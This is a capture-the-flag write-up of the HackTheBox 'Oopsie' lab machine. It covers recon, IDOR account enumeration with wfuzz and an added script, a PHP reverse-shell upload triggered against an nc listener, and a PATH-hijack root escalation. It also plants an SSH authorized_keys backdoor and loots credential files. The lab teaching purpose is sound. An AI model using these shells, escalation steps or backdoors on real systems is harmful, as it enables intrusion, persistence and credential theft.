Box 2: HTB - Oopsie
As a routine, I start with Nmap for port scanning and reconnaissance. For an explanation of nmap syntax and its parameters, visit this site: https://explainshell.com/
nmap -sV -n -vv -Pn -T4 -p- -A 10.10.10.28 --open
The nmap result is briefer than I expected: there are only 2 open ports for us to explore today, 22 (SSH) and 80 (HTTP):
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
There is not much to do here. I ran Hydra for an authentication brute-force with rockyou.txt in the background, but unfortunately it found nothing. Meanwhile, I also ran dirsearch to enumerate the site's directories for anything interesting, and I browsed the site to inspect the menus and tabs and view the page source.
dirsearch -u http://10.10.10.28 -e html,js,php,old,bak
Options:
-u URL, --url=URL : Target URL
-e EXTENSIONS, --extensions=EXTENSIONS : Extension list separated by commas (Example: php,asp)
dirsearch finds some directories on this site, but they are inaccessible when I try to open them; they probably require authentication and authorization. There is a login page, but it redirects to the homepage when I try it.
On the other hand, while reading the page source, I find an unusual path: /cdn-cgi/login/script.js
The page has quite a bit of content, so another way to start is to filter out just the links to pages and scripts with curl:
curl 10.10.10.28 | grep -E --colour 'href|script'
Open the directory that path lives in, /cdn-cgi/login/, in your browser and the login page is right there.
What next? I had tried to brute-force the login with Hydra, without luck. Finally, some Google-fu showed that the boxes in this HackTheBox track build on each other, so let's try reusing the admin password from the previously compromised machine with common usernames such as administrator or admin. This was my first encounter with that behaviour; keep it in mind for the later boxes!
Right after logging in, I open the "Upload" tab first, because file upload is usually the attack vector for getting a reverse-shell connection. It is not that easy, though.
Back on the "Account" tab, you see some information about the currently logged-in account. The "Access ID" is 34322, and in the URL bar the parameter "id" equals 1, which is our current admin user. I checked the cookies and found something interesting: the cookie "user" is 34322 too.
With id=1 in the URL bar, changing it to 2 gives an empty page. It might be possible to brute-force the id values and display the user value for another user, such as a super admin account. We can do this with wfuzz; I'll fuzz the "id" parameter from 0 to 100:
wfuzz -c -z range,0-100 --hh 3595 -b role=admin -b user=34322 -u "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=FUZZ"
-c : Output with colors
-u url : Specify a URL for the request
-z payload : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder]. A list of encoders can be used
-b cookie : Specify a cookie for the requests. Repeat option for various cookies
--hh : Hide responses whose body has the given number of characters
Why --hh 3595 in this command? Try the URL again with "id" equal to 2. That value is invalid, so the server responds with an empty page, as below:
So with any invalid "id", the response pages are identical and have the same character count, 3595. We want to ignore those and focus only on the HTTP responses with a different content length, which correspond to valid "id" values. Let's view the wfuzz result below:
Notice: What is fuzzing?
To keep it simple, fuzzing can be seen as "fancy brute-forcing" to some degree, but you can fuzz things you cannot brute-force. Fuzzing uses security tools to automate feeding the input we provide into targets such as websites or software applications. It is an extremely effective process because computers can perform laborious tasks like finding hidden files and folders or trying different usernames and passwords much faster than a human can (or is willing to). For more information about the wfuzz tool, please visit this. If you have problems installing it, check this for a workaround. I hope it helps.
Another way to do the same task is BurpSuite Intruder. First, use Proxy mode to capture the request we send to the web server (configure the browser to send its traffic through the proxy so it can be intercepted). Then send the request to Intruder and mark the id value as the payload position.
Next, move to the "Payloads" tab to define the value range used for fuzzing. To create a list containing the values 0,1,...,100, you can use this one-liner:
for i in $(seq 0 100); do echo $i; done > list.txt
"Load" this list into "Payload Sets" and click "Attack".
In the results window, as with wfuzz, focus only on the HTTP responses with a different content length.
Going through the whole list, the value id=30 returns the "super admin" Access ID.
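The id enumeration done above with wfuzz and Burp Intruder, as a small script. This is an added example, not code from the original write-up. It assumes the URL, the admin cookies (role=admin, user=34322) and the baseline id=2 from the write-up; the response for an invalid id is taken as the baseline, and any id whose response length differs is reported, which is what wfuzz --hh does.

```shell
#!/bin/sh
# Added example, not part of the original write-up. URL, cookie values and
# the baseline id are taken from the write-up above.
BASE_URL='http://10.10.10.28/cdn-cgi/login/admin.php'
COOKIES='role=admin; user=34322'

# Byte count of the response body for one id (what wfuzz reports as Chars).
fetch_len() {
    curl -s -b "$COOKIES" "$BASE_URL?content=accounts&id=$1" | wc -c | tr -d ' '
}

# enum_ids FIRST LAST [BASELINE_ID]
# Prints "<id> <length>" for every id whose response length differs from the
# baseline response (an id known to be invalid, id=2 in the write-up).
# Equivalent to running wfuzz with --hh <baseline length>.
enum_ids() {
    first=$1
    last=$2
    baseline_id=${3:-2}
    baseline=$(fetch_len "$baseline_id")
    i=$first
    while [ "$i" -le "$last" ]; do
        n=$(fetch_len "$i")
        if [ "$n" != "$baseline" ]; then
            printf '%s %s\n' "$i" "$n"
        fi
        i=$((i + 1))
    done
    return 0
}

# Live usage against the box:
#   enum_ids 0 100
```

Length filtering is a heuristic: a valid account whose page happens to be exactly as long as the empty page would be hidden. If the hit list looks thin, compare a hash of the body (md5sum) instead of wc -c, which is the same idea wfuzz offers with its other filters.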
Now we can change the "user" cookie to 86575 in the browser. After that, try the "Upload" tab again; this time it works!
In the next step, we upload a reverse shell to the server and run it. If you use Kali Linux like me, a collection of PHP webshells is available in /usr/share/webshells/. You can list them with ls.
I picked php-reverse-shell.php this time. After changing the IP and port values, upload the file, capture the request, substitute the user cookie value as before, and click Upload.
That succeeded, but where did the file go? Remember the dirsearch step: we found a directory called "uploads". Try http://10.10.10.28/uploads and it gives a 301. Now set up a listener and trigger the reverse shell:
sudo nc -lnvp <port number>
In the browser, open your reverse shell's location and press Enter to run it:
http://10.10.10.28/uploads/<your reverse-shell file name>.php
The current shell is not a tty and is inconvenient, so let's upgrade it. Use which python or which python3 to check whether Python is available on this machine. python3 is present in /bin/, so run the command below to spawn an interactive tty shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
At this point you can easily find the user.txt flag in /home/robert/. I won't disclose the flag in this write-up; enjoy finding it yourself. Next, it is a good idea to look through the web root, /var/www/html. I found some script files there, and db.php is one of them. It holds the MySQL credential for robert; does it work elsewhere?
Yes, we still have another open service port: SSH.
ssh robert@10.10.10.28 → Enter → provide the password
Now that we are robert, look around the home directory again and see what we have. After going through these files, nothing juicy turns up. I considered using find to list all interesting files that robert has permission to access. After minutes of being stuck, I ran id and found that robert is a member of an unusual group, bugtracker.
So let's enumerate the filesystem to see whether this group has any special access:
find / -type f -group bugtracker 2> /dev/null
The only file found is /usr/bin/bugtracker. This executable is suspicious, so let's inspect it. First I looked at its shared libraries with ldd, but there is nothing exploitable there since I can't hijack those paths. After some Google-fu, I ran strings to get an idea of what the program has hard-coded, then ltrace to see exactly which library calls it makes. This was my first time with these two commands, and I did not have much information or a cheat sheet on them; research them later when possible!
strings command explanation: https://www.lifewire.com/strings-linux-command-4093452
ltrace command explanation: https://man7.org/linux/man-pages/man1/ltrace.1.html
Looking at the output, a system() call runs the cat command, and the setuid line sets the UID to 0, which is root (setuid(0) can only succeed because the binary already runs with root privileges, and it inherits our environment). The binary invokes cat by its bare name instead of an absolute path, so the shell resolves it through PATH. By creating a malicious cat and prepending the current working directory to PATH, we can abuse this misconfiguration and escalate our privileges to root.
Let's add the current working directory to the front of PATH, create the malicious binary and make it executable:
export PATH=$(pwd):$PATH
echo '/bin/sh' > cat
chmod +x cat
Finally, execute /usr/bin/bugtracker to get a root shell. Remember that we changed PATH so that cat now resolves to our fake binary; to read file contents, use the absolute path /bin/cat instead of plain cat. You will easily find the root.txt flag in /root/. Explore it yourself.
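The PATH-hijack mechanics of the bugtracker step, reproduced in user space so they can be tried without a SUID binary. This is an added example, not code from the original write-up or from the box. It assumes a stand-in for the vulnerable program (a plain sh -c "cat <file>", which is how system() resolves a bare command name) and uses a fake cat that only announces itself instead of spawning a shell; everything happens in a temporary directory.

```shell
#!/bin/sh
# Added example, not part of the original write-up. Stand-in for the
# bugtracker binary: system("cat <path>") resolves the bare name "cat"
# through PATH, exactly like this sh -c call does.
victim_read() {
    sh -c "cat $1"
}

# Prepare a directory with a real target file and a fake cat, then put that
# directory first in PATH. Equivalent to the write-up's
#   echo '/bin/sh' > cat; chmod +x cat; export PATH=$(pwd):$PATH
# except that the fake cat only reports who it runs as.
setup_hijack() {
    WORKDIR=$(mktemp -d)
    printf 'hello from the real file\n' > "$WORKDIR/target.txt"
    printf '#!/bin/sh\necho HIJACKED: running as $(id -un)\n' > "$WORKDIR/cat"
    chmod +x "$WORKDIR/cat"
    ORIG_PATH=$PATH
    PATH="$WORKDIR:$PATH"
    export PATH
}

# Restore PATH and remove the temporary directory.
teardown_hijack() {
    PATH=$ORIG_PATH
    export PATH
    rm -rf "$WORKDIR"
}

# Which binary a bare "cat" currently resolves to.
which_cat() {
    command -v cat
}

# Reading a file the way the write-up recommends after the hijack: by
# absolute path, which bypasses the PATH lookup.
real_read() {
    /bin/cat "$1"
}

# Stand-alone demonstration:
#   setup_hijack
#   which_cat                          # prints $WORKDIR/cat
#   victim_read "$WORKDIR/target.txt"  # prints HIJACKED: running as <you>
#   real_read "$WORKDIR/target.txt"    # prints hello from the real file
#   teardown_hijack
```

With a SUID-root program the fake cat inherits root's effective UID, which is the whole escalation; here it just shows that the victim and a direct /bin/cat read two different things from the same command line. The fix on the program side is to call /bin/cat by absolute path or, better, to read the file directly and not spawn a shell at all.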
I was afraid of losing this connection and considered setting up a backdoor, so I'll create a basic SSH key pair (ssh-keygen) and add the public key to root's authorized_keys file; then I can get in as root anytime. On your own machine, run ssh-keygen to generate the key pair. Two key files are created: id_rsa (private key) and id_rsa.pub (public key). Copy the public key into the authorized_keys file in the SSH directory of the victim machine (10.10.10.28), ~/.ssh/. Then try connecting over SSH from the Kali machine to the box with the private key just created:
Some Google-sama and I found the reason this fails: ssh refuses a private key file whose permissions are too open. I fixed the file's permissions with:
chmod 600 id_rsa
Visit this for an explanation of file permissions in Linux.
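The persistence step above, as a script that installs a public key with the permissions ssh and sshd insist on and checks them. This is an added example, not code from the original write-up. It takes the home directory and key line as arguments so it can be exercised against a temporary directory; the key line used in the demonstration is a constructed placeholder, not a real key.

```shell
#!/bin/sh
# Added example, not part of the original write-up.

# install_authorized_key <home-dir> <public-key-line>
# Appends the key to <home-dir>/.ssh/authorized_keys, creating the directory
# and file with the modes sshd's StrictModes check requires, and without
# adding the same key twice.
install_authorized_key() {
    home=$1
    pubkey=$2
    sshdir="$home/.ssh"
    keys="$sshdir/authorized_keys"
    mkdir -p "$sshdir"
    chmod 700 "$sshdir"
    touch "$keys"
    chmod 600 "$keys"
    if ! grep -qxF "$pubkey" "$keys"; then
        printf '%s\n' "$pubkey" >> "$keys"
    fi
}

# check_key_perms <home-dir>
# Prints "ok" when .ssh and authorized_keys have the expected modes,
# otherwise prints the offending path and returns 1. Uses the ls mode
# string so it works on any POSIX system.
check_key_perms() {
    home=$1
    case "$(ls -ld "$home/.ssh")" in
        drwx------*) ;;
        *) echo "$home/.ssh"; return 1 ;;
    esac
    case "$(ls -l "$home/.ssh/authorized_keys")" in
        -rw-------*) ;;
        *) echo "$home/.ssh/authorized_keys"; return 1 ;;
    esac
    echo ok
}

# private_key_perms_ok <private-key-file>
# ssh ignores a private key that group or others can read (the
# "UNPROTECTED PRIVATE KEY FILE" error), which is why the write-up needed
# chmod 600 id_rsa. Returns 0 only when group and other bits are clear.
private_key_perms_ok() {
    case "$(ls -l "$1")" in
        -r??------*) return 0 ;;
        *) return 1 ;;
    esac
}

# Usage on the box, as root, with the public key copied over from Kali:
#   install_authorized_key /root "$(cat id_rsa.pub)"
#   check_key_perms /root
```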
Now it's time to loot, so I pull the passwd file for credentials. As in my earlier experience, they may be useful for the next several boxes!
There is a file inside the .config directory with some additional credentials. Based on the last box, I'll add everything I found to my credentials file, because password reuse may be a theme here!
Finally, this is the 2nd box on my journey toward the OSCP exam. I'll try to add more details when possible.
THANKS FOR READING AND SUPPORTING!